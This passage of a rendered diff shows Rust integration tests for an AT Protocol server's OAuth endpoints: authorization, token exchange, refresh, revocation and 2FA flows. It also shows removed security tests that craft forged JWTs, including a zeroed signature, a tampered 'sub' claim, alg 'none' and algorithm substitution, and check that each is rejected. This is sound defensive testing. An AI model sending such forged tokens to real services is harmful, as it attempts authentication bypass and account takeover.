.unwrap();
1529
assert_eq!(token_res.status(), StatusCode::OK);
1530
let final_token: Value = token_res.json().await.unwrap();
1531
-
assert_eq!(
1532
-
final_token["sub"], user_did,
1533
-
"Token should be for the correct user"
1534
-
);
1535
}
···
2
mod helpers;
3
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
4
use chrono::Utc;
5
+
use common::{base_url, client, create_account_and_login, get_db_connection_string};
6
use reqwest::{StatusCode, redirect};
7
use serde_json::{Value, json};
8
use sha2::{Digest, Sha256};
···
10
use wiremock::{Mock, MockServer, ResponseTemplate};
11
12
fn no_redirect_client() -> reqwest::Client {
13
+
reqwest::Client::builder().redirect(redirect::Policy::none()).build().unwrap()
14
}
15
16
fn generate_pkce() -> (String, String) {
···
18
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
19
let mut hasher = Sha256::new();
20
hasher.update(code_verifier.as_bytes());
21
+
let code_challenge = URL_SAFE_NO_PAD.encode(&hasher.finalize());
22
(code_verifier, code_challenge)
23
}
24
···
41
.await;
42
mock_server
43
}
44
+
45
#[tokio::test]
46
+
async fn test_oauth_metadata_endpoints() {
47
let url = base_url().await;
48
let client = client();
49
+
let pr_res = client.get(format!("{}/.well-known/oauth-protected-resource", url)).send().await.unwrap();
50
+
assert_eq!(pr_res.status(), StatusCode::OK);
51
+
let pr_body: Value = pr_res.json().await.unwrap();
52
+
assert!(pr_body["resource"].is_string());
53
+
assert!(pr_body["authorization_servers"].is_array());
54
+
assert!(pr_body["bearer_methods_supported"].as_array().unwrap().contains(&json!("header")));
55
+
let as_res = client.get(format!("{}/.well-known/oauth-authorization-server", url)).send().await.unwrap();
56
+
assert_eq!(as_res.status(), StatusCode::OK);
57
+
let as_body: Value = as_res.json().await.unwrap();
58
+
assert!(as_body["issuer"].is_string());
59
+
assert!(as_body["authorization_endpoint"].is_string());
60
+
assert!(as_body["token_endpoint"].is_string());
61
+
assert!(as_body["jwks_uri"].is_string());
62
+
assert!(as_body["response_types_supported"].as_array().unwrap().contains(&json!("code")));
63
+
assert!(as_body["grant_types_supported"].as_array().unwrap().contains(&json!("authorization_code")));
64
+
assert!(as_body["code_challenge_methods_supported"].as_array().unwrap().contains(&json!("S256")));
65
+
assert_eq!(as_body["require_pushed_authorization_requests"], json!(true));
66
+
assert!(as_body["dpop_signing_alg_values_supported"].as_array().unwrap().contains(&json!("ES256")));
67
+
let jwks_res = client.get(format!("{}/oauth/jwks", url)).send().await.unwrap();
68
+
assert_eq!(jwks_res.status(), StatusCode::OK);
69
+
let jwks_body: Value = jwks_res.json().await.unwrap();
70
+
assert!(jwks_body["keys"].is_array());
71
}
72
+
73
#[tokio::test]
74
+
async fn test_par_and_authorize() {
75
let url = base_url().await;
76
let client = client();
77
let redirect_uri = "https://example.com/callback";
···
80
let (_, code_challenge) = generate_pkce();
81
let par_res = client
82
.post(format!("{}/oauth/par", url))
83
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
84
+
("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("scope", "atproto"), ("state", "test-state")])
85
+
.send().await.unwrap();
86
+
assert_eq!(par_res.status(), StatusCode::CREATED, "PAR should succeed");
87
+
let par_body: Value = par_res.json().await.unwrap();
88
+
assert!(par_body["request_uri"].is_string());
89
+
assert!(par_body["expires_in"].is_number());
90
let request_uri = par_body["request_uri"].as_str().unwrap();
91
+
assert!(request_uri.starts_with("urn:ietf:params:oauth:request_uri:"));
92
let auth_res = client
93
.get(format!("{}/oauth/authorize", url))
94
.header("Accept", "application/json")
95
.query(&[("request_uri", request_uri)])
96
+
.send().await.unwrap();
97
assert_eq!(auth_res.status(), StatusCode::OK);
98
+
let auth_body: Value = auth_res.json().await.unwrap();
99
assert_eq!(auth_body["client_id"], client_id);
100
assert_eq!(auth_body["redirect_uri"], redirect_uri);
101
assert_eq!(auth_body["scope"], "atproto");
102
+
let invalid_res = client
103
.get(format!("{}/oauth/authorize", url))
104
.header("Accept", "application/json")
105
+
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")])
106
+
.send().await.unwrap();
107
+
assert_eq!(invalid_res.status(), StatusCode::BAD_REQUEST);
108
+
let missing_res = client.get(format!("{}/oauth/authorize", url)).send().await.unwrap();
109
+
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
110
}
111
+
112
#[tokio::test]
113
+
async fn test_full_oauth_flow() {
114
let url = base_url().await;
115
let http_client = client();
116
let ts = Utc::now().timestamp_millis();
117
let handle = format!("oauth-test-{}", ts);
118
let email = format!("oauth-test-{}@example.com", ts);
119
let password = "oauth-test-password";
120
let create_res = http_client
121
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
122
+
.json(&json!({ "handle": handle, "email": email, "password": password }))
123
+
.send().await.unwrap();
124
assert_eq!(create_res.status(), StatusCode::OK);
125
let account: Value = create_res.json().await.unwrap();
126
let user_did = account["did"].as_str().unwrap();
···
131
let state = format!("state-{}", ts);
132
let par_res = http_client
133
.post(format!("{}/oauth/par", url))
134
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
135
+
("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("scope", "atproto"), ("state", &state)])
136
+
.send().await.unwrap();
137
+
let par_body: Value = par_res.json().await.unwrap();
138
let request_uri = par_body["request_uri"].as_str().unwrap();
139
let auth_client = no_redirect_client();
140
let auth_res = auth_client
141
.post(format!("{}/oauth/authorize", url))
142
+
.form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")])
143
+
.send().await.unwrap();
144
+
assert!(auth_res.status().is_redirection(), "Expected redirect, got {}", auth_res.status());
145
+
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
146
+
assert!(location.starts_with(redirect_uri), "Redirect to wrong URI");
147
+
assert!(location.contains("code="), "No code in redirect");
148
+
assert!(location.contains(&format!("state={}", state)), "Wrong state");
149
+
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
150
let token_res = http_client
151
.post(format!("{}/oauth/token", url))
152
+
.form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri),
153
+
("code_verifier", &code_verifier), ("client_id", &client_id)])
154
+
.send().await.unwrap();
155
+
assert_eq!(token_res.status(), StatusCode::OK, "Token exchange failed");
156
+
let token_body: Value = token_res.json().await.unwrap();
157
assert!(token_body["access_token"].is_string());
158
assert!(token_body["refresh_token"].is_string());
159
assert_eq!(token_body["token_type"], "Bearer");
160
assert!(token_body["expires_in"].is_number());
161
assert_eq!(token_body["sub"], user_did);
162
+
let access_token = token_body["access_token"].as_str().unwrap();
163
let refresh_token = token_body["refresh_token"].as_str().unwrap();
164
let refresh_res = http_client
165
.post(format!("{}/oauth/token", url))
166
+
.form(&[("grant_type", "refresh_token"), ("refresh_token", refresh_token), ("client_id", &client_id)])
167
+
.send().await.unwrap();
168
assert_eq!(refresh_res.status(), StatusCode::OK);
169
let refresh_body: Value = refresh_res.json().await.unwrap();
170
+
assert_ne!(refresh_body["access_token"].as_str().unwrap(), access_token);
171
+
assert_ne!(refresh_body["refresh_token"].as_str().unwrap(), refresh_token);
172
+
let introspect_res = http_client
173
+
.post(format!("{}/oauth/introspect", url))
174
+
.form(&[("token", refresh_body["access_token"].as_str().unwrap())])
175
+
.send().await.unwrap();
176
+
assert_eq!(introspect_res.status(), StatusCode::OK);
177
+
let introspect_body: Value = introspect_res.json().await.unwrap();
178
+
assert_eq!(introspect_body["active"], true);
179
+
let revoke_res = http_client
180
+
.post(format!("{}/oauth/revoke", url))
181
+
.form(&[("token", refresh_body["refresh_token"].as_str().unwrap())])
182
+
.send().await.unwrap();
183
+
assert_eq!(revoke_res.status(), StatusCode::OK);
184
+
let introspect_after = http_client
185
+
.post(format!("{}/oauth/introspect", url))
186
+
.form(&[("token", refresh_body["access_token"].as_str().unwrap())])
187
+
.send().await.unwrap();
188
+
let after_body: Value = introspect_after.json().await.unwrap();
189
+
assert_eq!(after_body["active"], false, "Revoked token should be inactive");
190
}
191
+
192
#[tokio::test]
193
+
async fn test_oauth_error_cases() {
194
let url = base_url().await;
195
let http_client = client();
196
let ts = Utc::now().timestamp_millis();
197
let handle = format!("wrong-creds-{}", ts);
198
let email = format!("wrong-creds-{}@example.com", ts);
199
+
http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
200
+
.json(&json!({ "handle": handle, "email": email, "password": "correct-password" }))
201
+
.send().await.unwrap();
202
+
let redirect_uri = "https://example.com/callback";
203
let mock_client = setup_mock_client_metadata(redirect_uri).await;
204
let client_id = mock_client.uri();
205
let (_, code_challenge) = generate_pkce();
206
let par_body: Value = http_client
207
.post(format!("{}/oauth/par", url))
208
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
209
+
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
210
+
.send().await.unwrap().json().await.unwrap();
211
let request_uri = par_body["request_uri"].as_str().unwrap();
212
let auth_res = http_client
213
.post(format!("{}/oauth/authorize", url))
214
.header("Accept", "application/json")
215
+
.form(&[("request_uri", request_uri), ("username", &handle), ("password", "wrong-password"), ("remember_device", "false")])
216
+
.send().await.unwrap();
217
assert_eq!(auth_res.status(), StatusCode::FORBIDDEN);
218
let error_body: Value = auth_res.json().await.unwrap();
219
assert_eq!(error_body["error"], "access_denied");
220
+
let unsupported = http_client
221
.post(format!("{}/oauth/token", url))
222
+
.form(&[("grant_type", "client_credentials"), ("client_id", "https://example.com")])
223
+
.send().await.unwrap();
224
+
assert_eq!(unsupported.status(), StatusCode::BAD_REQUEST);
225
+
let body: Value = unsupported.json().await.unwrap();
226
assert_eq!(body["error"], "unsupported_grant_type");
227
+
let invalid_refresh = http_client
228
.post(format!("{}/oauth/token", url))
229
+
.form(&[("grant_type", "refresh_token"), ("refresh_token", "invalid-token"), ("client_id", "https://example.com")])
230
+
.send().await.unwrap();
231
+
assert_eq!(invalid_refresh.status(), StatusCode::BAD_REQUEST);
232
+
let body: Value = invalid_refresh.json().await.unwrap();
233
assert_eq!(body["error"], "invalid_grant");
234
+
let invalid_introspect = http_client
235
.post(format!("{}/oauth/introspect", url))
236
.form(&[("token", "invalid.token.here")])
237
+
.send().await.unwrap();
238
+
assert_eq!(invalid_introspect.status(), StatusCode::OK);
239
+
let body: Value = invalid_introspect.json().await.unwrap();
240
assert_eq!(body["active"], false);
241
+
let expired_res = http_client
242
+
.get(format!("{}/oauth/authorize", url))
243
+
.header("Accept", "application/json")
244
+
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired")])
245
+
.send().await.unwrap();
246
+
assert_eq!(expired_res.status(), StatusCode::BAD_REQUEST);
247
}
248
+
249
#[tokio::test]
250
+
async fn test_oauth_2fa_flow() {
251
let url = base_url().await;
252
let http_client = client();
253
let ts = Utc::now().timestamp_millis();
254
+
let handle = format!("2fa-test-{}", ts);
255
+
let email = format!("2fa-test-{}@example.com", ts);
256
let password = "2fa-test-password";
257
let create_res = http_client
258
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
259
+
.json(&json!({ "handle": handle, "email": email, "password": password }))
260
+
.send().await.unwrap();
261
assert_eq!(create_res.status(), StatusCode::OK);
262
let account: Value = create_res.json().await.unwrap();
263
let user_did = account["did"].as_str().unwrap();
264
+
let db_url = get_db_connection_string().await;
265
+
let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap();
266
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
267
+
.bind(user_did).execute(&pool).await.unwrap();
268
let redirect_uri = "https://example.com/2fa-callback";
269
let mock_client = setup_mock_client_metadata(redirect_uri).await;
270
let client_id = mock_client.uri();
271
+
let (code_verifier, code_challenge) = generate_pkce();
272
let par_body: Value = http_client
273
.post(format!("{}/oauth/par", url))
274
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
275
+
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
276
+
.send().await.unwrap().json().await.unwrap();
277
let request_uri = par_body["request_uri"].as_str().unwrap();
278
let auth_client = no_redirect_client();
279
let auth_res = auth_client
280
.post(format!("{}/oauth/authorize", url))
281
+
.form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")])
282
+
.send().await.unwrap();
283
+
assert!(auth_res.status().is_redirection(), "Should redirect to 2FA page");
284
+
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
285
+
assert!(location.contains("/oauth/authorize/2fa"), "Should redirect to 2FA page, got: {}", location);
286
+
let twofa_invalid = http_client
287
.post(format!("{}/oauth/authorize/2fa", url))
288
.form(&[("request_uri", request_uri), ("code", "000000")])
289
+
.send().await.unwrap();
290
+
assert_eq!(twofa_invalid.status(), StatusCode::OK);
291
+
let body = twofa_invalid.text().await.unwrap();
292
+
assert!(body.contains("Invalid verification code") || body.contains("invalid"));
293
+
let twofa_code: String = sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1")
294
+
.bind(request_uri).fetch_one(&pool).await.unwrap();
295
let twofa_res = auth_client
296
.post(format!("{}/oauth/authorize/2fa", url))
297
.form(&[("request_uri", request_uri), ("code", &twofa_code)])
298
+
.send().await.unwrap();
299
+
assert!(twofa_res.status().is_redirection(), "Valid 2FA code should redirect");
300
+
let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
301
+
assert!(final_location.starts_with(redirect_uri) && final_location.contains("code="));
302
+
let auth_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap();
303
let token_res = http_client
304
.post(format!("{}/oauth/token", url))
305
+
.form(&[("grant_type", "authorization_code"), ("code", auth_code), ("redirect_uri", redirect_uri),
306
+
("code_verifier", &code_verifier), ("client_id", &client_id)])
307
+
.send().await.unwrap();
308
+
assert_eq!(token_res.status(), StatusCode::OK);
309
let token_body: Value = token_res.json().await.unwrap();
310
assert_eq!(token_body["sub"], user_did);
311
}
312
+
313
#[tokio::test]
314
+
async fn test_oauth_2fa_lockout() {
315
let url = base_url().await;
316
let http_client = client();
317
let ts = Utc::now().timestamp_millis();
···
320
let password = "2fa-test-password";
321
let create_res = http_client
322
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
323
+
.json(&json!({ "handle": handle, "email": email, "password": password }))
324
+
.send().await.unwrap();
325
let account: Value = create_res.json().await.unwrap();
326
let user_did = account["did"].as_str().unwrap();
327
+
let db_url = get_db_connection_string().await;
328
+
let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap();
329
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
330
+
.bind(user_did).execute(&pool).await.unwrap();
331
let redirect_uri = "https://example.com/2fa-lockout-callback";
332
let mock_client = setup_mock_client_metadata(redirect_uri).await;
333
let client_id = mock_client.uri();
334
let (_, code_challenge) = generate_pkce();
335
let par_body: Value = http_client
336
.post(format!("{}/oauth/par", url))
337
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
338
+
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
339
+
.send().await.unwrap().json().await.unwrap();
340
let request_uri = par_body["request_uri"].as_str().unwrap();
341
let auth_client = no_redirect_client();
342
let auth_res = auth_client
343
.post(format!("{}/oauth/authorize", url))
344
+
.form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")])
345
+
.send().await.unwrap();
346
assert!(auth_res.status().is_redirection());
347
for i in 0..5 {
348
let res = http_client
349
.post(format!("{}/oauth/authorize/2fa", url))
350
.form(&[("request_uri", request_uri), ("code", "999999")])
351
+
.send().await.unwrap();
352
if i < 4 {
353
+
assert_eq!(res.status(), StatusCode::OK);
354
}
355
}
356
let lockout_res = http_client
357
.post(format!("{}/oauth/authorize/2fa", url))
358
.form(&[("request_uri", request_uri), ("code", "999999")])
359
+
.send().await.unwrap();
360
let body = lockout_res.text().await.unwrap();
361
+
assert!(body.contains("Too many failed attempts") || body.contains("No 2FA challenge found"));
362
}
363
+
364
#[tokio::test]
365
+
async fn test_account_selector_with_2fa() {
366
let url = base_url().await;
367
let http_client = client();
368
let ts = Utc::now().timestamp_millis();
···
371
let password = "selector-2fa-password";
372
let create_res = http_client
373
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
374
+
.json(&json!({ "handle": handle, "email": email, "password": password }))
375
+
.send().await.unwrap();
376
let account: Value = create_res.json().await.unwrap();
377
let user_did = account["did"].as_str().unwrap().to_string();
378
let redirect_uri = "https://example.com/selector-2fa-callback";
···
381
let (code_verifier, code_challenge) = generate_pkce();
382
let par_body: Value = http_client
383
.post(format!("{}/oauth/par", url))
384
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
385
+
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
386
+
.send().await.unwrap().json().await.unwrap();
387
let request_uri = par_body["request_uri"].as_str().unwrap();
388
let auth_client = no_redirect_client();
389
let auth_res = auth_client
390
.post(format!("{}/oauth/authorize", url))
391
+
.form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "true")])
392
+
.send().await.unwrap();
393
assert!(auth_res.status().is_redirection());
394
+
let device_cookie = auth_res.headers().get("set-cookie")
395
.and_then(|v| v.to_str().ok())
396
.map(|s| s.split(';').next().unwrap_or("").to_string())
397
+
.expect("Should have device cookie");
398
+
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
399
+
assert!(location.contains("code="));
400
+
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
401
+
let _ = http_client
402
.post(format!("{}/oauth/token", url))
403
+
.form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri),
404
+
("code_verifier", &code_verifier), ("client_id", &client_id)])
405
+
.send().await.unwrap().json::<Value>().await.unwrap();
406
+
let db_url = get_db_connection_string().await;
407
+
let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap();
408
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
409
+
.bind(&user_did).execute(&pool).await.unwrap();
410
let (code_verifier2, code_challenge2) = generate_pkce();
411
let par_body2: Value = http_client
412
.post(format!("{}/oauth/par", url))
413
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
414
+
("code_challenge", &code_challenge2), ("code_challenge_method", "S256")])
415
+
.send().await.unwrap().json().await.unwrap();
416
let request_uri2 = par_body2["request_uri"].as_str().unwrap();
417
let select_res = auth_client
418
.post(format!("{}/oauth/authorize/select", url))
419
.header("cookie", &device_cookie)
420
.form(&[("request_uri", request_uri2), ("did", &user_did)])
421
+
.send().await.unwrap();
422
+
assert!(select_res.status().is_redirection());
423
+
let select_location = select_res.headers().get("location").unwrap().to_str().unwrap();
424
+
assert!(select_location.contains("/oauth/authorize/2fa"), "Should redirect to 2FA page");
425
+
let twofa_code: String = sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1")
426
+
.bind(request_uri2).fetch_one(&pool).await.unwrap();
427
let twofa_res = auth_client
428
.post(format!("{}/oauth/authorize/2fa", url))
429
.header("cookie", &device_cookie)
430
.form(&[("request_uri", request_uri2), ("code", &twofa_code)])
431
+
.send().await.unwrap();
432
assert!(twofa_res.status().is_redirection());
433
+
let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
434
+
assert!(final_location.starts_with(redirect_uri) && final_location.contains("code="));
435
+
let final_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap();
436
let token_res = http_client
437
.post(format!("{}/oauth/token", url))
438
+
.form(&[("grant_type", "authorization_code"), ("code", final_code), ("redirect_uri", redirect_uri),
439
+
("code_verifier", &code_verifier2), ("client_id", &client_id)])
440
+
.send().await.unwrap();
441
assert_eq!(token_res.status(), StatusCode::OK);
442
let final_token: Value = token_res.json().await.unwrap();
443
+
assert_eq!(final_token["sub"], user_did);
444
+
}
445
+
446
+
#[tokio::test]
447
+
async fn test_oauth_state_encoding() {
448
+
let url = base_url().await;
449
+
let http_client = client();
450
+
let ts = Utc::now().timestamp_millis();
451
+
let handle = format!("state-special-{}", ts);
452
+
let email = format!("state-special-{}@example.com", ts);
453
+
let password = "state-special-password";
454
+
http_client
455
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
456
+
.json(&json!({ "handle": handle, "email": email, "password": password }))
457
+
.send().await.unwrap();
458
+
let redirect_uri = "https://example.com/state-special-callback";
459
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
460
+
let client_id = mock_client.uri();
461
+
let (_, code_challenge) = generate_pkce();
462
+
let special_state = "state=with&special=chars&plus+more";
463
+
let par_body: Value = http_client
464
+
.post(format!("{}/oauth/par", url))
465
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
466
+
("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("state", special_state)])
467
+
.send().await.unwrap().json().await.unwrap();
468
+
let request_uri = par_body["request_uri"].as_str().unwrap();
469
+
let auth_client = no_redirect_client();
470
+
let auth_res = auth_client
471
+
.post(format!("{}/oauth/authorize", url))
472
+
.form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")])
473
+
.send().await.unwrap();
474
+
assert!(auth_res.status().is_redirection());
475
+
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
476
+
assert!(location.contains("state="));
477
+
let encoded_state = urlencoding::encode(special_state);
478
+
assert!(location.contains(&format!("state={}", encoded_state)), "State should be URL-encoded. Got: {}", location);
479
}
+302
-1627
tests/oauth_security.rs
+302
-1627
tests/oauth_security.rs
···
1
#![allow(unused_imports)]
2
-
#![allow(unused_variables)]
3
mod common;
4
mod helpers;
5
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
···
14
use wiremock::{Mock, MockServer, ResponseTemplate};
15
16
fn no_redirect_client() -> reqwest::Client {
17
-
reqwest::Client::builder()
18
-
.redirect(redirect::Policy::none())
19
-
.build()
20
-
.unwrap()
21
}
22
23
fn generate_pkce() -> (String, String) {
···
25
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
26
let mut hasher = Sha256::new();
27
hasher.update(code_verifier.as_bytes());
28
-
let hash = hasher.finalize();
29
-
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
30
(code_verifier, code_challenge)
31
}
32
33
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
34
let mock_server = MockServer::start().await;
35
-
let client_id = mock_server.uri();
36
let metadata = json!({
37
-
"client_id": client_id,
38
"client_name": "Security Test Client",
39
"redirect_uris": [redirect_uri],
40
"grant_types": ["authorization_code", "refresh_token"],
···
42
"token_endpoint_auth_method": "none",
43
"dpop_bound_access_tokens": false
44
});
45
-
Mock::given(method("GET"))
46
-
.and(path("/"))
47
.respond_with(ResponseTemplate::new(200).set_body_json(metadata))
48
-
.mount(&mock_server)
49
-
.await;
50
mock_server
51
}
52
53
async fn get_oauth_tokens(http_client: &reqwest::Client, url: &str) -> (String, String, String) {
54
let ts = Utc::now().timestamp_millis();
55
let handle = format!("sec-test-{}", ts);
56
-
let email = format!("sec-test-{}@example.com", ts);
57
-
let password = "security-test-password";
58
-
http_client
59
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
60
-
.json(&json!({
61
-
"handle": handle,
62
-
"email": email,
63
-
"password": password
64
-
}))
65
-
.send()
66
-
.await
67
-
.unwrap();
68
let redirect_uri = "https://example.com/sec-callback";
69
let mock_client = setup_mock_client_metadata(redirect_uri).await;
70
let client_id = mock_client.uri();
71
let (code_verifier, code_challenge) = generate_pkce();
72
-
let par_body: Value = http_client
73
-
.post(format!("{}/oauth/par", url))
74
-
.form(&[
75
-
("response_type", "code"),
76
-
("client_id", &client_id),
77
-
("redirect_uri", redirect_uri),
78
-
("code_challenge", &code_challenge),
79
-
("code_challenge_method", "S256"),
80
-
])
81
-
.send()
82
-
.await
83
-
.unwrap()
84
-
.json()
85
-
.await
86
-
.unwrap();
87
let request_uri = par_body["request_uri"].as_str().unwrap();
88
let auth_client = no_redirect_client();
89
-
let auth_res = auth_client
90
-
.post(format!("{}/oauth/authorize", url))
91
-
.form(&[
92
-
("request_uri", request_uri),
93
-
("username", &handle),
94
-
("password", password),
95
-
("remember_device", "false"),
96
-
])
97
-
.send()
98
-
.await
99
-
.unwrap();
100
-
let location = auth_res
101
-
.headers()
102
-
.get("location")
103
-
.unwrap()
104
-
.to_str()
105
-
.unwrap();
106
-
let code = location
107
-
.split("code=")
108
-
.nth(1)
109
-
.unwrap()
110
-
.split('&')
111
-
.next()
112
-
.unwrap();
113
-
let token_body: Value = http_client
114
-
.post(format!("{}/oauth/token", url))
115
-
.form(&[
116
-
("grant_type", "authorization_code"),
117
-
("code", code),
118
-
("redirect_uri", redirect_uri),
119
-
("code_verifier", &code_verifier),
120
-
("client_id", &client_id),
121
-
])
122
-
.send()
123
-
.await
124
-
.unwrap()
125
-
.json()
126
-
.await
127
-
.unwrap();
128
-
let access_token = token_body["access_token"].as_str().unwrap().to_string();
129
-
let refresh_token = token_body["refresh_token"].as_str().unwrap().to_string();
130
-
(access_token, refresh_token, client_id)
131
-
}
132
-
133
-
#[tokio::test]
134
-
async fn test_security_forged_token_signature_rejected() {
135
-
let url = base_url().await;
136
-
let http_client = client();
137
-
let (access_token, _, _) = get_oauth_tokens(&http_client, url).await;
138
-
let parts: Vec<&str> = access_token.split('.').collect();
139
-
assert_eq!(parts.len(), 3, "Token should have 3 parts");
140
-
let forged_signature = URL_SAFE_NO_PAD.encode(&[0u8; 32]);
141
-
let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_signature);
142
-
let res = http_client
143
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
144
-
.header("Authorization", format!("Bearer {}", forged_token))
145
-
.send()
146
-
.await
147
-
.unwrap();
148
-
assert_eq!(
149
-
res.status(),
150
-
StatusCode::UNAUTHORIZED,
151
-
"Forged signature should be rejected"
152
-
);
153
}
154
155
#[tokio::test]
156
-
async fn test_security_modified_payload_rejected() {
157
let url = base_url().await;
158
let http_client = client();
159
let (access_token, _, _) = get_oauth_tokens(&http_client, url).await;
160
let parts: Vec<&str> = access_token.split('.').collect();
161
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
162
let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
163
payload["sub"] = json!("did:plc:attacker");
164
let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
165
let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]);
166
-
let res = http_client
167
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
168
-
.header("Authorization", format!("Bearer {}", modified_token))
169
-
.send()
170
-
.await
171
-
.unwrap();
172
-
assert_eq!(
173
-
res.status(),
174
-
StatusCode::UNAUTHORIZED,
175
-
"Modified payload should be rejected"
176
-
);
177
}
178
179
#[tokio::test]
180
-
async fn test_security_algorithm_none_attack_rejected() {
181
let url = base_url().await;
182
let http_client = client();
183
-
let header = json!({
184
-
"alg": "none",
185
-
"typ": "at+jwt"
186
-
});
187
-
let payload = json!({
188
-
"iss": "https://test.pds",
189
-
"sub": "did:plc:attacker",
190
-
"aud": "https://test.pds",
191
-
"iat": Utc::now().timestamp(),
192
-
"exp": Utc::now().timestamp() + 3600,
193
-
"jti": "fake-token-id",
194
-
"scope": "atproto"
195
-
});
196
-
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
197
-
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
198
-
let malicious_token = format!("{}.{}.", header_b64, payload_b64);
199
-
let res = http_client
200
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
201
-
.header("Authorization", format!("Bearer {}", malicious_token))
202
-
.send()
203
-
.await
204
-
.unwrap();
205
-
assert_eq!(
206
-
res.status(),
207
-
StatusCode::UNAUTHORIZED,
208
-
"Algorithm 'none' attack should be rejected"
209
-
);
210
-
}
211
-
212
-
#[tokio::test]
213
-
async fn test_security_algorithm_substitution_attack_rejected() {
214
-
let url = base_url().await;
215
-
let http_client = client();
216
-
let header = json!({
217
-
"alg": "RS256",
218
-
"typ": "at+jwt"
219
-
});
220
-
let payload = json!({
221
-
"iss": "https://test.pds",
222
-
"sub": "did:plc:attacker",
223
-
"aud": "https://test.pds",
224
-
"iat": Utc::now().timestamp(),
225
-
"exp": Utc::now().timestamp() + 3600,
226
-
"jti": "fake-token-id"
227
-
});
228
-
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
229
-
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
230
-
let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]);
231
-
let malicious_token = format!("{}.{}.{}", header_b64, payload_b64, fake_sig);
232
-
let res = http_client
233
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
234
-
.header("Authorization", format!("Bearer {}", malicious_token))
235
-
.send()
236
-
.await
237
-
.unwrap();
238
-
assert_eq!(
239
-
res.status(),
240
-
StatusCode::UNAUTHORIZED,
241
-
"Algorithm substitution attack should be rejected"
242
-
);
243
-
}
244
-
245
-
#[tokio::test]
246
-
async fn test_security_expired_token_rejected() {
247
-
let url = base_url().await;
248
-
let http_client = client();
249
-
let header = json!({
250
-
"alg": "HS256",
251
-
"typ": "at+jwt"
252
-
});
253
-
let payload = json!({
254
-
"iss": "https://test.pds",
255
-
"sub": "did:plc:test",
256
-
"aud": "https://test.pds",
257
-
"iat": Utc::now().timestamp() - 7200,
258
-
"exp": Utc::now().timestamp() - 3600,
259
-
"jti": "expired-token-id"
